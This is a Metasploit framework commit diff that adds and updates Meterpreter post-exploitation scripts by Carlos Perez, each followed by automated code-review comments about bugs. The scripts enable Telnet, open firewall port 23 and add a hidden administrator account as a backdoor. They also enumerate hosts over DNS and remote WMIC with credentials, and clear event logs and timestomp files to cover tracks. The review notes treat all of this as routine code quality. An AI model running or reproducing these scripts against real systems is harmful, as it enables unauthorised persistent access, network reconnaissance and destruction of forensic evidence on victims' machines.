New scripts and updated scripts from Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-01-30 06:18:02 +00:00
parent f927320eda
commit e6ef0ab495
4 changed files with 519 additions and 17 deletions


@ -0,0 +1,201 @@
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note: If the Telnet Server is not installed in Vista or win2k8
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
if trgtos =~ /(Windows Vista)/
if checkifinst(session)
print_status("Telnet Service Installed on Target")
else
print_status("Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
r.channel.close
r.close
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
end
def usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end
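Review bot: `insttlntsrv` appends pkgmgr output with `tmpout << d` inside its read loop but never defines `tmpout`, so the Vista install branch raises a NameError as soon as the command produces output; add `tmpout = []` at the top of the method, or drop the buffer and just drain the channel. `checkifinst` returns from inside the read loop when `TlntSvr` matches and skips the `r.channel.close`/`r.close` that follow, so the channel and process handle are never closed on the positive path. In `winver`, `verout, minor, major = stringtest.scan(...)` destructures the list of matches rather than one match, so `verout` is the first `[major, minor, build]` triple, `minor`/`major` are always nil, and a `ver` output that does not match leaves `verout` nil and makes `verout[0]` raise; `m = stringtest.match(/(\d)\.(\d)\.(\d*)/)` with `return nil unless m` is clearer, and the same `winver` is added verbatim to the remotewinenum and winenum scripts in this commit, so one shared helper would fix all three. The `usage` text still names `getgui`, and the parser block handles a `-n` option that `@@exec_opts` does not declare, so `lport` can never be set and is dead.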


@ -4,7 +4,7 @@ require 'ftools'
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista #Meterpreter script for ping sweeps on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands. #Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1 #Verion: 0.1.2
#Note: #Note:
################## Variable Declarations ################## ################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new( @@exec_opts = Rex::Parser::Arguments.new(
@ -15,7 +15,8 @@ require 'ftools'
"-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
"-hl" => [ true, "File with Host List for DNS Forward Lookup"], "-hl" => [ true, "File with Host List for DNS Forward Lookup"],
"-d" => [ true, "Domain Name for DNS Forward Lookup"], "-d" => [ true, "Domain Name for DNS Forward Lookup"],
"-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"] "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
"-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
) )
session = client session = client
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
def stdlookup(session,domain,dest) def stdlookup(session,domain,dest)
dest = dest + "-general-record-lookup.txt" dest = dest + "-general-record-lookup.txt"
print_status("Getting MX and NS Records for Domain #{domain}") print_status("Getting MX and NS Records for Domain #{domain}")
filewrt(dest,"MX and NS Records for Domain #{domain}") filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
types = ["SOA","NS","MX"]
mxout = [] mxout = []
results = [] results = []
garbage = [] garbage = []
types.each do |t|
begin begin
r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read) while(d = r.channel.read)
mxout << d mxout << d
end end
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
r.close r.close
results = mxout.to_s.split(/\n/) results = mxout.to_s.split(/\n/)
results.each do |rec| results.each do |rec|
if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/ if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec garbage << rec.split(/\s*internet\saddress\s\=/)
else print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ")
print_status("\t#{rec}") filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ")
filewrt(dest,"#{rec}") garbage.clear
end end
garbage.clear
end end
rescue ::Exception => e rescue ::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}") print_status("The following Error was encountered: #{e.class} #{e}")
end end
end
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
# Function for writing results of other functions to a file # Function for writing results of other functions to a file
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
end end
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
#Function for enumerating srv records
def srvreclkp(session,domain,dest)
dest = dest + "-srvenum.txt"
srout = []
garbage = []
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
"_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
print_status("Performing SRV Record Enumeration for #{domain}")
filewrt(dest,"SRV Record Enumeration for #{domain}")
srvrcd.each do |srv|
r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
srout << d
end
r.channel.close
r.close
results = srout.to_s.split(/\n/)
results.each do |rec|
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
garbage.clear
end
garbage.clear
srout.clear
end
end
end
#-------------------------------------------------------------------------------
#Function to print message during run #Function to print message during run
def message(dest) def message(dest)
print_status "Network Enumerator Meterpreter Script " print_status "Network Enumerator Meterpreter Script "
@ -231,10 +269,12 @@ frdlkp = nil
dom = nil dom = nil
hostlist = nil hostlist = nil
helpcall = nil helpcall = nil
srvrc = nil
# Parsing of Options # Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val| @@exec_opts.parse(args) { |opt, idx, val|
case opt case opt
when "-sr"
srvrc = 1
when "-rl" when "-rl"
rvrslkp = 1 rvrslkp = 1
when "-fl" when "-fl"
@ -249,6 +289,7 @@ helpcall = nil
hostlist = val hostlist = val
when "-r" when "-r"
range = val range = val
when "-h" when "-h"
print( print(
"Network Enumerator Meterpreter Script\n" + "Network Enumerator Meterpreter Script\n" +
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
message(logs) message(logs)
frwdlp(session,hostlist,dom,dest) frwdlp(session,hostlist,dom,dest)
elsif dom != nil && stdlkp == 1 elsif dom != nil && stdlkp == 1
message(logs)
stdlookup(session,dom,dest) stdlookup(session,dom,dest)
elsif dom != nil && srvrc == 1
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil elsif helpcall == nil
print( print(
"Network Enumerator Meterpreter Script\n" + "Network Enumerator Meterpreter Script\n" +


@ -0,0 +1,210 @@
#!/usr/bin/env ruby
#
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
# and Windows XP remote targets using native windows command wmic.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note:
################## Variable Declarations ##################
session = client
# Variables for Options
helpcall = 0
rusr = nil
rpass = nil
trg = ""
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu."],
"-t" => [ true, "The target address"],
"-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
"-p" => [ true, "Password of user on target system"]
)
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
# Create the log directory
::FileUtils.mkdir_p(logs)
# WMIC Commands that will be executed on the Target
wmic = [
'environment list',
'share list',
'nicconfig list',
'computersystem list',
'useraccount list',
'group list',
'sysaccount list',
'volume list brief',
'service list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'qfe list'
]
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in a array, returs string
def wmicexec(session,wmic,user,pass,trgt)
print_status("Running WMIC Commands ....")
tmpout = ''
command = nil
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
wmic.each do |wmi|
if user == nil
print_status("The commands will be ran under the credentials of #{runningas}")
command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
else
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
end
print_status "\trunning command wimic #{wmi}"
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
#print_status "\twmic #{command}"
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
sleep(2)
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
# Close output file in host
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each do |d|
output.puts(d)
end
output.close
end
#------------------------------------------------------------------------------
# Function to generate report header
def headerbuid(session,target,dest)
# Header for File that will hold all the output of the commands
info = session.sys.config.sysinfo
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
header << "Running as: #{client.sys.config.getuid}\n"
header << "From: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "Target: #{target}\n"
header << "\n\n\n"
print_status("Saving report to #{dest}")
header
end
#------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#------------------------------------------------------------------------------
# Function Help Message
def helpmsg
print(
"Remote Windows Enumeration Meterpreter Script\n" +
"This script will enumerate windows hosts in the target enviroment\n" +
"given a username and password or using the credential under witch\n" +
"Meterpeter is running using WMI wmic windows native tool.\n" +
"Usage:\n" +
@@exec_opts.usage
)
end
################## MAIN ##################
localos = winver(session)
# Check that the command is not being ran on a Win2k host
# since wmic is not present in Windows 2000
if localos =~ /(Windows 2000)/
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
else
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
trg = val
when "-u"
rusr = val
when "-p"
rpass = val
when "-h"
helpmsg
helpcall = 1
end
}
#logfile name
dest = logs + "/" + trg + filenameinfo
# Executing main logic of the script
if helpcall == 0 and trg != ""
# Making sure that is running as System a Username and Password for target machine must be provided
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
print_status("Stopped: Running as System and no user provided for connecting to target!!")
else trg != nil && helpcall != 1
filewrt(dest,headerbuid(session,trg,dest))
filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
end
elsif helpcall == 0 and trg == ""
helpmsg
end
end
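Review bot: The `else trg != nil && helpcall != 1` line in the main block evaluates that expression and discards it, so the branch is a plain `else` and the condition guards nothing; it reads like an intended `elsif`, but since the enclosing `if helpcall == 0 and trg != ""` already establishes both facts, a bare `else` is the honest form. In `wmicexec` only the last `r` of each loop iteration is closed: the three `cmd.exe /c echo ...` processes are assigned to `r` and then overwritten, so their handles are never closed, and because `wmicfl` is assigned inside the `begin`, a failure in `expand_path` makes the cleanup line run `cmd.exe /c del` with an empty name. `headerbuid` reads `client.sys.config.getuid` while the rest of the function uses its `session` parameter; use `session` there for consistency. The `print_status("The commands will be ran under the credentials of ...")` message sits inside `wmic.each`, so it repeats once per command; hoisting it above the loop prints it once.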


@ -3,7 +3,7 @@
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
# and Windows XP targets using native windows commands. # and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.3.2 #Verion: 0.3.4
#Note: Compleatly re-writen to make it modular and better error handling. #Note: Compleatly re-writen to make it modular and better error handling.
# Working on adding more Virtual Machine Checks and looking at improving # Working on adding more Virtual Machine Checks and looking at improving
# the code but retain the independance of each module so it is easier for # the code but retain the independance of each module so it is easier for
@ -33,13 +33,18 @@ commands = [
'ipconfig /displaydns', 'ipconfig /displaydns',
'route print', 'route print',
'net view', 'net view',
'netstat -na', 'netstat -nao',
'netstat -vb',
'netstat -ns', 'netstat -ns',
'net accounts', 'net accounts',
'net accounts /domain',
'net session',
'net share', 'net share',
'net group', 'net group',
'net user', 'net user',
'net localgroup', 'net localgroup',
'net localgroup administrators',
'net group administrators',
'net view /domain', 'net view /domain',
'netsh firewall show config', 'netsh firewall show config',
'tasklist /svc' 'tasklist /svc'
@ -62,11 +67,12 @@ cmdstomp = [
wmic = [ wmic = [
'computersystem list', 'computersystem list',
'useraccount list', 'useraccount list',
'group', 'group list',
'service list brief', 'service list brief',
'volume list brief', 'volume list brief',
'process list brief', 'process list brief',
'startup list full', 'startup list full',
'rdtoggle list',
'qfe', 'qfe',
] ]
#Specific Commands for Windows vista for Wireless Enumeration #Specific Commands for Windows vista for Wireless Enumeration
@ -84,6 +90,12 @@ nonwin2kcmd = [
'wbem\\wmic.exe', 'wbem\\wmic.exe',
'netsh.exe', 'netsh.exe',
] ]
# Executables not pressent in Windows 2000
nowin2kexe = [
'netsh.exe',
'tasklist.exe',
'wbem\\wmic.exe',
]
################## Function Declarations ################## ################## Function Declarations ##################
# Function to check if Target Machine a VM # Function to check if Target Machine a VM
@ -357,7 +369,7 @@ end
def covertracks(session,cmdstomp) def covertracks(session,cmdstomp)
clrevtlgs(session) clrevtlgs(session)
info = session.sys.config.sysinfo info = session.sys.config.sysinfo
trgtos = info['OS'] trgtos = winver(session)
if trgtos =~ /(Windows 2000)/ if trgtos =~ /(Windows 2000)/
chmace(session,cmdstomp - nonwin2kcmd) chmace(session,cmdstomp - nonwin2kcmd)
else else
@ -488,6 +500,36 @@ def killApp(session,procpid)
session.sys.process.kill(procpid) session.sys.process.kill(procpid)
print_status("Old process #{procpid} killed.") print_status("Old process #{procpid} killed.")
end end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#--------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------
# Function to execute process migration # Function to execute process migration
@ -537,7 +579,7 @@ if helpopt != 1
header << "Host: #{info['Computer']}\n" header << "Host: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n" header << "OS: #{info['OS']}\n"
header << "\n\n\n" header << "\n\n\n"
trgtos = info['OS'] trgtos = winver(session)
print_status("Saving report to #{dest}") print_status("Saving report to #{dest}")
filewrt(dest,header) filewrt(dest,header)
filewrt(dest,chkvm(session)) filewrt(dest,chkvm(session))
@ -566,7 +608,11 @@ if helpopt != 1
end end
if (cm != nil) if (cm != nil)
filewrt(dest,"EventLogs where Cleared") filewrt(dest,"EventLogs where Cleared")
covertracks(session,cmdstomp) if trgtos =~ /(Windows 2000)/
covertracks(session,cmdstomp - nowin2kexe)
else
covertracks(session,cmdstomp)
end
end end
print_status("Done!") print_status("Done!")
end end
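Review bot: The new Windows 2000 branch in the main block (`covertracks(session,cmdstomp - nowin2kexe)`) and the updated `covertracks`, which now calls `winver(session)` itself and subtracts `nonwin2kcmd` on the same match, apply the exclusion twice and execute `cmd.exe /c ver` on the target twice per run; passing the already computed `trgtos` into `covertracks`, or keeping the check in one place, would remove the duplication. The added `nowin2kexe` list appears to carry the same entries as `nonwin2kcmd` (`netsh.exe` and `wbem\\wmic.exe` are visible in both, though the head of `nonwin2kcmd` is outside this hunk), so one list would do. `nonwin2kcmd` is a top-level local referenced inside `def covertracks`; whether it resolves depends on how the script is evaluated — worth confirming, since the new outer branch looks like a workaround for exactly that. After the change, `info = session.sys.config.sysinfo` in `covertracks` no longer feeds `trgtos` and nothing in the visible part of the function uses it; the body continues outside the hunk, so check the rest before dropping the line.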